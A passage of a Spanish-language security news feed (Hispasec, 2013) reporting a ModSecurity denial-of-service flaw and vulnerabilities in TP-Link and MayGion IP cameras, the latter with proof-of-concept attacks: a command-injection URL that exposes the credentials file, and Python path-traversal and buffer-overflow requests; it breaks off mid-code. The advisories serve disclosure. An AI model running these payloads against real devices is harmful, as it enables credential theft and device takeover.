&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Juan José Ruiz&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:jruiz@hispasec.com"&gt;jruiz@hispasec.com&lt;/a&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/3n2_HAvHsw4" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/3n2_HAvHsw4/vulnerabilidades-en-rsa-authentication.html</link><author>noreply@blogger.com (Hispasec)</author><thr:total>0</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/06/vulnerabilidades-en-rsa-authentication.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-52340090113543613</guid><pubDate>Sat, 01 Jun 2013 10:00:00 +0000</pubDate><atom:updated>2013-06-01T12:00:01.417+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">software</category><category domain="http://www.blogger.com/atom/ns#">ModSecurity</category><title>Denegación de servicio en ModSecurity 2.x</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span style="font-size: 13pt;"&gt;Younes Jaaidi ha reportado un error en ModSecurity que podría ser aprovechado para causar una &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;denegación de servicio de forma remota&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt; con solo enviar una petición HTTP especialmente manipulada.&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
ModSecurity es un cortafuegos de aplicaciones web (Web Application Firewall o WAF) de código abierto, multiplataforma, desarrollado por Trustwave's SpiderLabs y disponible para Apache, IIS y Nginx. ModSecurity, a diferencia de los sistemas de prevención y detección de intrusiones que se basan en firmas específicas para vulnerabilidades conocidas, hace uso de reglas que proporcionan una protección genérica contra vulnerabilidades aún desconocidas de aplicaciones web, monitorizando y bloqueando el uso de técnicas habituales para su explotación. Además permite monitorizar y analizar en tiempo real el tráfico HTTP y los registros (logs).&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
La vulnerabilidad se debe a un fallo cuando se utiliza un "&lt;i&gt;Content-Type&lt;/i&gt;" desconocido (unknown) y se activa la acción "&lt;i&gt;forceRequestBodyVariable&lt;/i&gt;" que podría causar una desreferencia a puntero nulo en msr-&amp;gt;msc_reqbody_chunks-&amp;gt;elts however msr-&amp;gt;msc_reqbody_chunk.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Un atacante remoto podría aprovechar este error y, a través de una petición HTTP especialmente manipulada, &lt;b&gt;conseguir que la aplicación dejase de funcionar&lt;/b&gt;.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
La vulnerabilidad ha sido registrada como CVE-2013-2765 y afecta a las versiones de ModSecurity 2.7.3 y anteriores. &lt;a href="https://github.com/SpiderLabs/ModSecurity/blob/master/CHANGES"&gt;Trustwave's SpiderLabs ha publicado ModSecurity 2.7.4 que soluciona este fallo de seguridad.&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;Más información:&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
ModSecurity Update Changes&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="https://github.com/SpiderLabs/ModSecurity/blob/master/CHANGES"&gt;https://github.com/SpiderLabs/ModSecurity/blob/master/CHANGES&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
Juan José Ruiz&lt;/div&gt;
&lt;div align="right" class="MsoNormal" style="text-align: right;"&gt;
&lt;a href="mailto:jruiz@hispasec.com"&gt;jruiz@hispasec.com&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/wtwoTuDQ4ho" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/hispasec/zCAd/~3/wtwoTuDQ4ho/denegacion-de-servicio-en-modsecurity-2x.html</link><author>noreply@blogger.com (Hispasec)</author><thr:total>0</thr:total><feedburner:origLink>http://unaaldia.hispasec.com/2013/06/denegacion-de-servicio-en-modsecurity-2x.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-9000895764691586838.post-853136195945719773</guid><pubDate>Fri, 31 May 2013 11:50:00 +0000</pubDate><atom:updated>2013-05-31T13:57:42.773+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Camaras IP</category><category domain="http://www.blogger.com/atom/ns#">firmware</category><category domain="http://www.blogger.com/atom/ns#">TP-Link</category><category domain="http://www.blogger.com/atom/ns#">Hardware</category><category domain="http://www.blogger.com/atom/ns#">Zavio</category><category domain="http://www.blogger.com/atom/ns#">MayGion</category><title>Múltiples vulnerabilidades en diferentes cámaras IP (TP-Link, MayGion y Zavio)</title><description>&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span style="font-size: 13.0pt;"&gt;Nahuel Riva y Francisco Falcon de Core Exploit han descubierto y publicado &lt;b&gt;múltiples vulnerabilidades en cámaras IP&lt;/b&gt; de los fabricantes TP-Link, MayGion y Zavio. También han desarrollado diversas pruebas de concepto para demostrar estos fallos de seguridad.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Las vulnerabilidades que &lt;a href="http://www.coresecurity.com/advisories/tp-link-IP-cameras-multiple-vulnerabilities"&gt;afectan a las cámaras IP TP-Link&lt;/a&gt; son:&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-2572"&gt;CVE-2013-2572&lt;/a&gt;: un atacante remoto podría utilizar los credenciales fijados en el fichero de configuración '&lt;i&gt;boa.conf&lt;/i&gt;' para acceder a la interfaz web de administración.&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-2573"&gt;CVE-2013-2573&lt;/a&gt;: un error de falta de filtrado de parámetros de entrada en '&lt;i&gt;/cgi-bin/mft/wireless_mft.cgi&lt;/i&gt;' podría permitir la inyección de comandos de forma remota.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Como prueba de concepto, se inyecta un comando en la siguiente URL para alojar una copia del fichero que almacena los credenciales de los usuarios en el directorio raíz del servidor web, aprovechando la vulnerabilidad &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-2573"&gt;CVE-2013-2573&lt;/a&gt;:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;a href="http://xn--direccin_ip-web/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales"&gt;http://DIRECCIÓN_IP/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: right; margin-left: 1em; text-align: right;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-BMzw9u7VhXM/UaiL5n3DpaI/AAAAAAAACk4/4J6oqQqdGAw/s1600/TP-Link_TL-SC3130G-01.jpg" imageanchor="1" style="clear: right; margin-bottom: 1em; margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-BMzw9u7VhXM/UaiL5n3DpaI/AAAAAAAACk4/4J6oqQqdGAw/s1600/TP-Link_TL-SC3130G-01.jpg" height="200" width="126" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;TP-Link TL-SC 3130G&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
quedando accesible desde la URL: &lt;a href="http://xn--direccin_ip-web/credenciales"&gt;http://DIRECCIÓN_IP/credenciales&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Se ven afectados los dispositivos con firmware v1.6.18P12, y se han comprobado los modelos: &lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;TL-SC 3130 (solo la vulnerabilidad CVE-2013-2572 afecta a este dispositivo)&lt;/li&gt;
&lt;li&gt;TL-SC 3130G&lt;/li&gt;
&lt;li&gt;TL-SC 3171G&lt;/li&gt;
&lt;li&gt;TL-SC 4171G&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;b&gt;TP-Link ha publicado una actualización&lt;/b&gt; de firmware que corrige los errores en su página web.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Por su parte &lt;a href="http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities"&gt;las cámaras IP del fabricante MayGion&lt;/a&gt; presentan otras dos vulnerabilidades:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-1604"&gt;CVE-2013-1604&lt;/a&gt;: un atacante remoto no autenticado podría aprovechar un problema de ruta transversal para realizar un volcado de la memoria del dispositivo y obtener credenciales válidas de usuario.&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-1605"&gt;CVE-2013-1605&lt;/a&gt;: un fallo de desbordamiento de memoria podría permitir la ejecución de código arbitrario de forma remota.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Los investigadores han publicado dos sencillas PoC escritas en python para probar estos dos fallos:&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;ul&gt;
&lt;li&gt;Para obtener un &lt;b&gt;volcado de la memoria del dispositivo&lt;/b&gt; (&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-1604"&gt;CVE-2013-1604&lt;/a&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="background: white; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;b style="font-family: 'Courier New'; font-size: 13px;"&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b style="font-family: 'Courier New'; font-size: 13px;"&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;import&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; httplib&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: white; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;conn &lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;=&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; httplib&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;.&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;HTTPConnection&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;(&lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;"DIRECCIÓN_IP"&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;conn&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;.&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;request&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;(&lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;"GET"&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;,&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; &lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;"/../../../../../../../../../proc/kcore"&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;)&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: white; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;resp &lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;=&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; conn&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;.&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;getresponse&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;()&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: white; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;data &lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;=&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; resp&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;.&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;read&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;()&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: white; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;b style="font-family: 'Courier New'; font-size: 13px;"&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;conn&lt;/span&gt;&lt;span style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;.&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;close&lt;/span&gt;&lt;span style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt;"&gt;()&lt;/span&gt;&lt;span style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;ul&gt;
&lt;li&gt;Para causar un &lt;b&gt;desbordamiento de memoria&lt;/b&gt; y conseguir que el registro '&lt;i&gt;Instruction Pointer&lt;/i&gt;' sea sobrescrito con el valor 0x61616161 (&lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=2013-1605"&gt;CVE-2013-1605&lt;/a&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: white; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;b style="font-family: 'Courier New'; font-size: 13px;"&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;import&lt;/span&gt;&lt;/b&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; httplib&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: white; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;conn &lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;=&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; httplib&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;.&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;HTTPConnection&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;(&lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;"DIRECCIÓN_IP"&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;)&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: white; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;b&gt;&lt;span lang="EN-GB" style="color: maroon; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/b&gt;conn&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;.&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;request&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;(&lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;"GET"&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;,&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; &lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;"/"&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; &lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;+&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; &lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;"A"&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; &lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;*&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; &lt;/span&gt;&lt;span lang="EN-GB" style="color: #008c00; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;3000&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; &lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;+&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt; &lt;/span&gt;&lt;span lang="EN-GB" style="color: #0000e6; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;".html"&lt;/span&gt;&lt;span lang="EN-GB" style="color: #808030; font-family: &amp;quot;Courier New&amp;quot;; font-size: 10.0pt; mso-ansi-language: EN-GB;"&gt;)&lt;/span&gt;&lt;span lang="EN-GB" style="font-family: 'Courier New'; font-size: 10pt;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="background: white; tab-stops: 45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;"&gt;
